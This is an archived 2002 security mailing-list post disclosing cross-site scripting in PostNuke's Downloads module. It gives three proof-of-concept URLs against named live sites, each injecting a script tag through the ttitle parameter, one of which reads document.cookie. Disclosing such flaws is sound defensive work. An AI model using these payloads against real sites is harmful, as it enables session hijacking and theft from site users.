CrossSiteScripting PostNuke.

From: rolphin (rolphinat_private)
Date: Sun Jan 06 2002 - 09:38:38 PST

Next message: Michal Zalewski: "Re: Pine 4.33 (at least) URL handler allows embedded commands."

Previous message: D.: "Re: [AP] awhttpd v2.2 local DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://www.testnuke.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=2&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E

http://www.nukeaddon.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=1&ttitle=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.boomtchak.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=67&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E


This is in the download module, and these are from postnuke.
I only search for 3 minutes and follow links in the main postnuke page.



I really think you should quit smocking =]
" Air.

-- 
rolphin

Next message: Michal Zalewski: "Re: Pine 4.33 (at least) URL handler allows embedded commands."
Previous message: D.: "Re: [AP] awhttpd v2.2 local DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jan 06 2002 - 22:58:16 PST